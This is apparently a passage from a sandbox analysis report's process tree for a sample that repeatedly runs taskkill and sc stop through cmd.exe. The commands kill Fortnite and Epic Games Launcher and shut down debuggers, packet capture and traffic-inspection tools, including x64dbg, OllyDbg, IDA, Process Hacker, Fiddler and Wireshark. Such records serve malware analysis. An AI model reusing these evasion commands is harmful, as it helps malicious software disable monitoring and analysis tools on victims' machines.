  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2744
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2016
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:1560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1836
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:1952
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2544
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
  2⤵
  PID:2148
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerProSdk
    3⤵
    - Launches sc.exe
    PID:332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4712
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:3984
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:2952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2448
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:1856
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    PID:4488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:1400
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4060
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:1828
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:1824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3156
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:1208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2280
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1684
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:572
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4828
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    PID:1476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4352
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3264
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4936
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2428
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4784
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1108
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4468
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4080
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2244
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4516
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:4196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4932
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5008
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4528
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4900
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4380
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3752
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq die*" /IM * /F /T
    3⤵
    PID:2472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2468
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:580
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
  2⤵
  PID:3280
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebugger.exe
    3⤵
    PID:1672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:5080
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
  2⤵
  PID:4756
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FolderChangesView.exe
    3⤵
    PID:2456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:776
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
  2⤵
  PID:3984
- - C:\Windows\system32\sc.exe
    sc stop HttpDebuggerSdk
    3⤵
    PID:4296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:2860
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:3908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1732
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3308
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:2656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:664
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2352
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:2340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1348
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:4024
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:2532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1436
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3828
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3488
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:1808
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:4332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2064
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:1360
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Kills process with taskkill
    PID:2428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3272
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:464
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:1108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:608
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3900
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3636
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2536
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4552
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4236
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1180
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:5032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3192
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3240
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:892
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:716
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:1668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:576
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:2032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3436
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3816
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4740
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:1196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2456
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2844
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4176
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1008
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:4060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2656
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1412
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2000
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:1228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1168
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:648
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:1476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1260
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4964
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:3116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4128
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:1800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1360
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:2176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1528
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:1404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2272
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4448
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    PID:1256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3352
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:5004
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4808
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4896
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1312
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2060
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:5032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
  2⤵
  PID:3760
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerProSdk
    3⤵
    PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4148
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:1776
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    - Suspicious use of AdjustPrivilegeToken
    PID:2904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:4140
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    PID:3432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1932
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:3536
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:208
